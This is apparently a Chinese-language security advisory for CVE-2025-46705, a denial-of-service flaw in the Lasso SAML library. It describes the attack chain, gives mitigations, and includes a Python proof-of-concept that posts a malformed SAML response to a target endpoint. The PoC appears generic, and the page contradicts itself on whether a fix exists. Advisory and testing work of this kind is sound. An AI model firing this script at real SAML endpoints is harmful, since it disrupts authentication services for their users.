CVE-2025-46705: Entr'ouvert Lasso SAML响应拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-46705

漏洞类型

拒绝服务(DoS)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Entr'ouvert Lasso

漏洞概述

CVE-2025-46705是Entr'ouvert Lasso库中的一个高危拒绝服务漏洞。该漏洞存在于Lasso 2.5.1和2.8.2版本的g_assert_not_reached功能中。攻击者可以通过发送特制的畸形SAML断言响应来触发该漏洞，导致服务拒绝。Entr'ouvert Lasso是一个广泛使用的SAML（安全断言标记语言）实现库，用于实现SSO（单点登录）和身份联合功能。由于该漏洞无需认证即可利用，且通过网络即可发起攻击，因此具有较高的安全风险。受影响系统在接收到恶意构造的SAML响应时，可能会导致应用程序崩溃或服务中断，影响身份认证系统的可用性。建议受影响用户尽快升级到最新修复版本。

技术细节

该漏洞位于Entr'ouvert Lasso库的SAML断言处理逻辑中。当库解析特制的SAML断言响应时，触发了g_assert_not_reached宏，导致程序异常终止。g_assert_not_reached通常用于标记不应到达的代码路径，当程序执行到此处时表明存在逻辑错误或异常状态。攻击者可以利用SAML响应构造特定的数据结构，使得断言检查失败。具体来说，攻击者需要在SAML响应中注入非法的断言数据，如格式错误的属性值、异常的会话标识或无效的状态转换，从而触发拒绝服务条件。由于SAML协议在企业身份管理中的广泛应用，任何处理SAML响应的Lasso实例都可能受到影响。漏洞的利用不需要任何认证凭证，攻击者只需能够向目标系统发送HTTP请求即可。

攻击链分析

STEP 1

步骤1

攻击者识别使用Entr'ouvert Lasso库的目标SAML服务提供商或身份提供商

STEP 2

步骤2

攻击者构造包含畸形数据的SAML断言响应，特意触发g_assert_not_reached宏

STEP 3

步骤3

攻击者通过HTTP POST向目标SAML ACS(断言消费服务)端点发送恶意SAML响应

STEP 4

步骤4

Lasso库解析SAML响应时遇到无效的断言条件或状态，触发断言失败

STEP 5

步骤5

程序执行到g_assert_not_reached代码路径，导致进程崩溃或异常终止

STEP 6

步骤6

目标服务可用性丧失，无法处理正常的SAML认证请求，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-46705 PoC - Entr'ouvert Lasso SAML DoS Note: This PoC demonstrates the vulnerability concept for educational purposes """ import base64 import xml.etree.ElementTree as ET from lxml import etree def generate_malicious_saml_response(): """ Generate a malformed SAML assertion response to trigger g_assert_not_reached """ # Create SAML Response with malformed assertion saml_namespace = { 'samlp': 'urn:oasis:names:tc:SAML:2.0:protocol', 'saml': 'urn:oasis:names:tc:SAML:2.0:assertion' } # Malformed assertion with invalid status code malicious_saml = '''<?xml version="1.0" encoding="UTF-8"?> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_malformed_response" Version="2.0" IssueInstant="2025-01-01T00:00:00Z"> <saml:Issuer>https://attacker.example.com</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:InvalidAssertion"/> </samlp:Status> <saml:Assertion ID="_malformed_assertion"> <saml:Issuer>https://attacker.example.com</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"> [email protected] </saml:NameID> </saml:Subject>  <saml:Conditions NotBefore="invalid-timestamp" NotOnOrAfter="also-invalid"> <saml:AudienceRestriction> <saml:Audience>https://target.example.com</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AttributeStatement> <saml:Attribute Name="malformed-attribute"> <saml:AttributeValue>  </saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> </samlp:Response>''' return malicious_saml def exploit(target_url): """ Send malformed SAML response to target """ import requests saml_response = generate_malicious_saml_response() headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'SOAPAction': 'http://schemas.xmlsoap.org/soap/envelope/', } # Encode SAML response for HTTP POST data = { 'SAMLResponse': base64.b64encode(saml_response.encode()).decode(), 'RelayState': '/dashboard' } print(f"[*] Sending malformed SAML response to {target_url}") print(f"[*] Payload length: {len(saml_response)} bytes") try: response = requests.post(target_url, data=data, headers=headers, timeout=10) print(f"[!] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[+] Exploit sent - Target may be affected: {e}") if __name__ == "__main__": import sys if len(sys.argv) > 1: exploit(sys.argv[1]) else: print("Usage: python cve-2025-46705.py <target_url>")

影响范围

Entr'ouvert Lasso < 2.5.1

Entr'ouvert Lasso 2.5.1

Entr'ouvert Lasso 2.8.2

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 限制SAML端点的网络访问，只允许可信IP访问；2) 实施SAML响应的预验证机制，在传递给Lasso库前进行严格的数据校验；3) 配置异常监控，当服务响应异常时自动告警；4) 考虑使用负载均衡器实现健康检查，当服务不可用时自动切换到备用节点；5) 定期备份配置，确保服务可以快速恢复。